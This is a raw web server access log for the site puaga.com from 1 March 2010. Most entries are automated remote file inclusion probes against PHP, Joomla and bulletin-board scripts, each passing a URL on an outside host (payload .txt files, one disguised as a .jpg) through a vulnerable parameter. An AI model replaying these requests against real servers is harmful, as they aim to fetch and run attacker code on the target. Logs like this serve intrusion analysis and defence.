64.15.152.132 - - [01/Mar/2010:04:54:42 -0800] "GET /logs/access_100215.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:04:55:04 -0800] "GET /logs/access_100203.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:04:55:13 -0800] "GET /logs/access_100203.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:04:55:29 -0800] "GET /logs/access_100215.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.131.66.198 - - [01/Mar/2010:04:55:54 -0800] "GET //vwar/backup/errors.php?error=http://cyberzins.fileave.com/n1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.131.66.198 - - [01/Mar/2010:04:55:54 -0800] "GET /logs/access_100221.log///vwar/backup/errors.php?error=http://cyberzins.fileave.com/n1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.131.66.198 - - [01/Mar/2010:04:55:54 -0800] "GET /logs///vwar/backup/errors.php?error=http://cyberzins.fileave.com/n1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.131.66.198 - - [01/Mar/2010:04:55:57 -0800] "GET /logs/access.log///vwar/backup/errors.php?error=http://cyberzins.fileave.com/n1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:04:56:13 -0800] "GET /logs/access_100203.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:04:56:21 -0800] "GET /logs/access_100203.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.115.26 - - [01/Mar/2010:04:57:06 -0800] "GET /pictures/ HTTP/1.0" 200 7797 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.115.26 - - [01/Mar/2010:04:57:06 -0800] "GET /style/PuagaDark.css HTTP/1.0" 200 2588 "http://puaga.com/pictures/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
203.59.136.42 - - [01/Mar/2010:04:57:52 -0800] "GET /logs/index.php?redir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [01/Mar/2010:04:57:52 -0800] "GET /logs/access_100123.log%20%20/index.php?redir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [01/Mar/2010:04:57:53 -0800] "GET /index.php?redir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
121.254.214.60 - - [01/Mar/2010:04:58:20 -0800] "GET /logs/access_100207.log//modules/xfsection/modify.php?dir_module=http://www.lpm.mgroup.pl/modules/xoopsgallery/idv6-news.txt????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
121.254.214.60 - - [01/Mar/2010:04:58:20 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.lpm.mgroup.pl/modules/xoopsgallery/idv6-news.txt????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
121.254.214.60 - - [01/Mar/2010:04:58:20 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.lpm.mgroup.pl/modules/xoopsgallery/idv6-news.txt????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
203.59.136.42 - - [01/Mar/2010:04:58:29 -0800] "GET /logs/access_100213.log%20%20/index.php?redir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.214.60 - - [01/Mar/2010:04:58:31 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.lpm.mgroup.pl/modules/xoopsgallery/idv6-news.txt????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
121.254.214.60 - - [01/Mar/2010:04:58:32 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.lpm.mgroup.pl/modules/xoopsgallery/idv6-news.txt????? HTTP/1.0" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
121.254.214.60 - - [01/Mar/2010:04:58:32 -0800] "GET /logs/access_100207.log//modules/xfsection/modify.php?dir_module=http://www.lpm.mgroup.pl/modules/xoopsgallery/idv6-news.txt????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
83.103.72.130 - - [01/Mar/2010:04:58:35 -0800] "GET /logs//export.php?mosConfig_absolute_path=http://www.anabolex.com/list-old/admin/temp/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [01/Mar/2010:04:58:36 -0800] "GET /logs/access_100127.log%20%20//export.php?mosConfig_absolute_path=http://www.anabolex.com/list-old/admin/temp/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:04:58:47 -0800] "GET /com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:04:58:47 -0800] "GET /logs//com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:04:58:47 -0800] "GET /logs/access_100123.log%20%20//com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [01/Mar/2010:04:58:48 -0800] "GET /logs/access_100212.log%20%20//export.php?mosConfig_absolute_path=http://www.anabolex.com/list-old/admin/temp/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:04:58:50 -0800] "GET /com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:04:58:50 -0800] "GET /logs//com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:04:58:51 -0800] "GET /logs/access_100123.log%20%20//com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:04:59:02 -0800] "GET /logs/access_100205.log%20%20//com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [01/Mar/2010:04:59:04 -0800] "GET /logs/access_100204.log%20%20//export.php?mosConfig_absolute_path=http://www.anabolex.com/list-old/admin/temp/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:04:59:13 -0800] "GET /logs/access_100205.log%20%20//com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [01/Mar/2010:04:59:24 -0800] "GET /logs/access_100203.log%20%20//export.php?mosConfig_absolute_path=http://www.anabolex.com/list-old/admin/temp/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.214.60 - - [01/Mar/2010:04:59:31 -0800] "GET /logs/access_100204.log//modules/xfsection/modify.php?dir_module=http://www.lpm.mgroup.pl/modules/xoopsgallery/idv6-news.txt????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
121.254.214.60 - - [01/Mar/2010:04:59:36 -0800] "GET /logs/access_100204.log//modules/xfsection/modify.php?dir_module=http://www.lpm.mgroup.pl/modules/xoopsgallery/idv6-news.txt????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
83.103.72.130 - - [01/Mar/2010:05:03:01 -0800] "GET /logs/access_100124.log//export.php?mosConfig_absolute_path=http://www.anabolex.com/list-old/admin/temp/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.115.26 - - [01/Mar/2010:05:03:12 -0800] "GET /sitemap.xml HTTP/1.0" 200 233 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
83.103.72.130 - - [01/Mar/2010:05:03:13 -0800] "GET /logs/access_100127.log//export.php?mosConfig_absolute_path=http://www.anabolex.com/list-old/admin/temp/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [01/Mar/2010:05:07:59 -0800] "GET /logs/access_100123.log/index.php?redir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [01/Mar/2010:05:08:15 -0800] "GET /logs/access_100213.log/index.php?redir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:05:08:47 -0800] "GET /logs/access_100215.log///includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:05:08:47 -0800] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:05:08:47 -0800] "GET /logs///includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:05:08:58 -0800] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:05:08:58 -0800] "GET /logs///includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:05:08:58 -0800] "GET /logs/access_100215.log///includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:05:09:08 -0800] "GET /logs/access_100221.log///includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:05:09:36 -0800] "GET /logs/access_100221.log///includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.191.54.186 - - [01/Mar/2010:05:11:06 -0800] "GET / HTTP/1.0" 200 3626 "http://puaga.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)" "puaga.com"
204.16.2.161 - - [01/Mar/2010:05:11:42 -0800] "GET /logs/access_100123.log//newspublish/include.php?path%5Bdocroot%5D=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:05:11:42 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:05:11:42 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:05:11:45 -0800] "GET /logs/access_100123.log/?path%5Bdocroot%5D=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:05:11:45 -0800] "GET /logs/?path%5Bdocroot%5D=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:05:11:45 -0800] "GET /?path%5Bdocroot%5D=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:05:11:48 -0800] "GET /logs/access_100123.log/?path%5Bdocroot%5D=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:05:11:48 -0800] "GET /logs/?path%5Bdocroot%5D=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:05:11:49 -0800] "GET /?path%5Bdocroot%5D=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:05:12:00 -0800] "GET /logs/access_100123.log//newspublish/include.php?path%5Bdocroot%5D=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:05:12:00 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:05:12:00 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.puaga.com"
83.103.72.130 - - [01/Mar/2010:05:12:23 -0800] "GET /logs///?_zb_path=http://203.157.114.10/homepage/hinso//mambots/editors/sc1?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [01/Mar/2010:05:12:23 -0800] "GET /logs/access_100210.log%20%20///?_zb_path=http://203.157.114.10/homepage/hinso//mambots/editors/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [01/Mar/2010:05:12:24 -0800] "GET //?_zb_path=http://203.157.114.10/homepage/hinso//mambots/editors/sc1?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [01/Mar/2010:05:12:45 -0800] "GET //?_zb_path=http://203.157.114.10/homepage/hinso//mambots/editors/sc1?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [01/Mar/2010:05:12:45 -0800] "GET /logs/access_100210.log%20%20///?_zb_path=http://203.157.114.10/homepage/hinso//mambots/editors/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [01/Mar/2010:05:12:47 -0800] "GET /logs///?_zb_path=http://203.157.114.10/homepage/hinso//mambots/editors/sc1?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [01/Mar/2010:05:14:21 -0800] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [01/Mar/2010:05:14:21 -0800] "GET /logs/access_100218.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [01/Mar/2010:05:14:21 -0800] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [01/Mar/2010:05:14:38 -0800] "GET /logs/access_100201.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [01/Mar/2010:05:14:46 -0800] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [01/Mar/2010:05:14:46 -0800] "GET /logs/access_100218.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [01/Mar/2010:05:14:46 -0800] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [01/Mar/2010:05:15:03 -0800] "GET /logs/access_100201.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.117.2.17 - - [01/Mar/2010:05:15:58 -0800] "GET /logs/access_100220.log%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.117.2.17 - - [01/Mar/2010:05:15:58 -0800] "GET /components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.117.2.17 - - [01/Mar/2010:05:15:58 -0800] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:05:16:02 -0800] "GET /logs/access_100206.log/?spaw_root=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:05:16:02 -0800] "GET /logs/?spaw_root=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:05:16:03 -0800] "GET /?spaw_root=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:05:16:10 -0800] "GET /logs/?spaw_root=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:05:16:10 -0800] "GET /logs/access_100206.log/?spaw_root=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:05:16:10 -0800] "GET /?spaw_root=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.puaga.com"
211.117.2.17 - - [01/Mar/2010:05:16:19 -0800] "GET /logs/access_100124.log%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.117.2.17 - - [01/Mar/2010:05:16:32 -0800] "GET /components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.117.2.17 - - [01/Mar/2010:05:16:32 -0800] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.117.2.17 - - [01/Mar/2010:05:16:32 -0800] "GET /logs/access_100220.log%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:05:17:01 -0800] "GET /logs/access_100129.log/?path%5Bdocroot%5D=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:05:17:04 -0800] "GET /logs/access_100129.log/?path%5Bdocroot%5D=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.puaga.com"
211.117.2.17 - - [01/Mar/2010:05:17:15 -0800] "GET /logs/access_100124.log%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:05:17:17 -0800] "GET /logs/access_100129.log//newspublish/include.php?path%5Bdocroot%5D=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:05:17:53 -0800] "GET /logs/access_100129.log//newspublish/include.php?path%5Bdocroot%5D=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:05:18:55 -0800] "GET /logs/access_100221.log/?spaw_root=http://www.cepp56.com//editor/id.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:05:19:07 -0800] "GET /logs/access_100221.log/?spaw_root=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:05:20:33 -0800] "GET /logs/access_100224.log/?path%5Bdocroot%5D=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:05:20:46 -0800] "GET /logs/access_100224.log/?path%5Bdocroot%5D=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:05:20:57 -0800] "GET /logs/access_100224.log//newspublish/include.php?path%5Bdocroot%5D=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:05:21:42 -0800] "GET /logs/access_100224.log//newspublish/include.php?path%5Bdocroot%5D=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.puaga.com"
216.104.40.170 - - [01/Mar/2010:05:24:07 -0800] "GET /logs/access_100218.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [01/Mar/2010:05:24:07 -0800] "GET /logs/access_100201.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:05:25:03 -0800] "GET /logs//bbs/delete_all.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:05:25:04 -0800] "GET /logs/access_100203.log%20%20//bbs/delete_all.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:05:25:04 -0800] "GET /bbs/delete_all.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:05:25:25 -0800] "GET /logs/access_100206.log%20%20//bbs/delete_all.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.108.237.12 - - [01/Mar/2010:05:25:28 -0800] "GET /logs/access_100211.log%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.108.237.12 - - [01/Mar/2010:05:25:28 -0800] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.108.237.12 - - [01/Mar/2010:05:25:29 -0800] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
211.117.2.17 - - [01/Mar/2010:05:26:02 -0800] "GET /logs/access_100124.log//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.117.2.17 - - [01/Mar/2010:05:26:02 -0800] "GET /logs/access_100119.log//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
